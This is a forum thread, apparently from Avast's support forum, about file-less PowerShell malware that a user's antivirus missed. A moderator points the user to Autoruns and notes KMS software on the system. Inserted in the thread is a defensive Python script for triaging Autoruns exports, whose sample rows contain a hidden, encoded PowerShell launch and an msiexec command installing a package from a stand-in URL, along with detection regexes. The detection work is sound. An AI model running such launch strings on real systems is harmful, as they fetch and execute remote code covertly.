Thanks AVAST

I was using AVIRA Anti-Virus FREE Edition for the past 2 years. However, that particular software somehow allowed a powershell.exe virus to enter my system. It’s been residing on my system for the past 3 or 4 months and Avira just watched silently. Did nothing about it! I always updated my virus definitions to the latest version.

Whenever I restarted my computer, a small window (with no content) would pop up whose name was “powershell”, and after a few seconds it would automatically disappear. Today I was browsing the web and suddenly my CPU usage went sky high. I am not sure what suddenly triggered this. Something was not right at all. It seemed like some sort of software installation was taking place in the background.

I had to disconnect my internet and force shut down my computer. After restarting my system, I started Malwarebytes (which was fortunately there on my system), updated it and started a FULL scan. After a few minutes Malwarebytes was totally stuck at 81% for more than 30 minutes. I don’t know what happened.

But its auto-protection kept on blocking “soplifan.ru” (C:\Windows\SysWOW64\msiexec.exe) from connecting to the internet. See attached screenshot.

Malwarebytes was stuck, so I downloaded both SUPERAntiSpyware and Spybot S&D and updated them. Ran a full scan. No detection!

Now Avast came to my mind. I immediately downloaded and updated your software. And without any scan, your software’s auto-protection feature caught the malware within a few seconds! See attached screenshots.

Thanks AVAST. I am impressed. Keep up the good work.

https://forum.avast.com/index.php?topic=194892.0

Hi mrinmayb,

I’m not sure how to take this.

The detection is correct, as we stopped the powershell from running. We haven’t removed the executable of the powershell.

The detection means that there is file-less malware which is using powershell, and we report the process, not the file itself.

I suggest you use Autoruns https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns to see if there is some information about the powershell and/or msiexec.

If you can share the output of Autoruns with me, I can help you with finding the virus if we haven’t removed it completely.
You can share the download link with me via a PM.

Regards,
PDI
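A defender-side triage of an Autoruns CSV export along the lines PDI suggests, as an added example that is not from this thread, from Avast or from Sysinternals. The column layout follows my recollection of `autorunsc -c` output (an assumption), and the rows are constructed to resemble the powershell and msiexec autostarts described in the thread.

```python
import csv
import io
import re

# Constructed sample of an Autoruns CSV export. The column names are assumed
# from the autorunsc -c layout; every row below is invented for illustration.
SAMPLE_CSV = """Entry Location,Entry,Enabled,Category,Description,Signer,Image Path,Launch String
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,Updater,enabled,Logon,,,c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe,powershell.exe -NoP -W Hidden -enc SQBFAFgA
Task Scheduler,\\OneDrive Standalone Update,enabled,Tasks,Microsoft OneDrive,(Verified) Microsoft Corporation,c:\\users\\u\\appdata\\local\\microsoft\\onedrive\\onedrivestandaloneupdater.exe,onedrivestandaloneupdater.exe
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run,Installer,enabled,Logon,,,c:\\windows\\syswow64\\msiexec.exe,msiexec.exe /q /i http://example.invalid/pkg.msi
HKLM\\System\\CurrentControlSet\\Services,Spooler,enabled,Services,Print Spooler,(Verified) Microsoft Windows,c:\\windows\\system32\\spoolsv.exe,spoolsv.exe
"""

# Launch-string traits that are rare in legitimate autostart entries but
# typical of file-less PowerShell persistence and remote MSI installs.
SUSPICIOUS = [
    (re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I), "encoded PowerShell command"),
    (re.compile(r"powershell(\.exe)?\b.*\s-w(indowstyle)?\s+hidden\b", re.I), "hidden PowerShell window"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|frombase64string)\b", re.I), "PowerShell download or eval"),
    (re.compile(r"msiexec(\.exe)?\b.*https?://", re.I), "msiexec installing from a URL"),
]

# Binaries that almost never need to start by themselves at user logon.
LOGON_INTERPRETERS = ("powershell.exe", "msiexec.exe", "wscript.exe", "cscript.exe", "mshta.exe")


def triage(csv_text):
    """Return (entry, location, reasons) for enabled autostart rows that warrant a look."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("Enabled", "").lower() != "enabled":
            continue  # disabled entries cannot run; review them later
        launch = row.get("Launch String", "")
        reasons = [why for pat, why in SUSPICIOUS if pat.search(launch)]
        image = row.get("Image Path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
        if row.get("Category", "") == "Logon" and image in LOGON_INTERPRETERS:
            reasons.append("script interpreter or installer autostarted at logon")
        if reasons:
            findings.append((row["Entry"], row["Entry Location"], reasons))
    return findings


if __name__ == "__main__":
    for entry, location, reasons in triage(SAMPLE_CSV):
        print(f"{entry} ({location}): {', '.join(reasons)}")
```

On a real export, replace SAMPLE_CSV with the file Autoruns saved; the flagged entries are the ones to disable and examine, not proof of infection by themselves.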

Hello

I think you got me wrong.

I am praising AVAST and cursing AVIRA :smiley:

Yes, but the infection can still be present on your system.
I strongly suggest following the instructions in the link I gave you and having one of the malware removers have a look.

???

Ok I will be back with the logs ASAP

Thanks

Please see attached files

Thanks

What is KMS doing on your system?

Thanks for your help. I will get rid of this software. I am now able to understand where the malware probably came from.

Thanks